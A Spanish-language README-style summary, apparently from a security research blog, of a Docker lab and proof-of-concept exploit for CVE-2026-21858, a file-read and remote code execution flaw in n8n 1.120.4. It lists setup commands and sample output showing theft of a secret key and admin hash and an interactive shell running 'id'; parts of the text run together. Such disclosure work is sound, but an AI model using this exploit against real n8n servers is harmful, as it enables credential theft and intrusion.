
Entorno PoC basado en Docker y script de exploit para CVE-2026-21858, una vulnerabilidad de lectura arbitraria de archivos y RCE en n8n 1.120.4, que proporciona extracción de secretos y una shell interactiva.
Entorno PoC para n8n 1.120.4 con un flujo de trabajo Form Trigger y un script de explotación.
Dockerfile — construye el entorno vulnerable de n8nrun.bat — ejecuta el contenedor (Windows)workflow.txt — flujo de trabajo de n8n (incluye Form Trigger)poc.py — script PoCrequirements.txt — dependencias del PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, identificadores de admin) del objetivo.n8n-shell>).id) devuelve la salida del entorno objetivo (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Publicamos análisis de CVE y malware una vez al mes. Si estás interesado, sigue los enlaces a continuación para consultar nuestras publicaciones.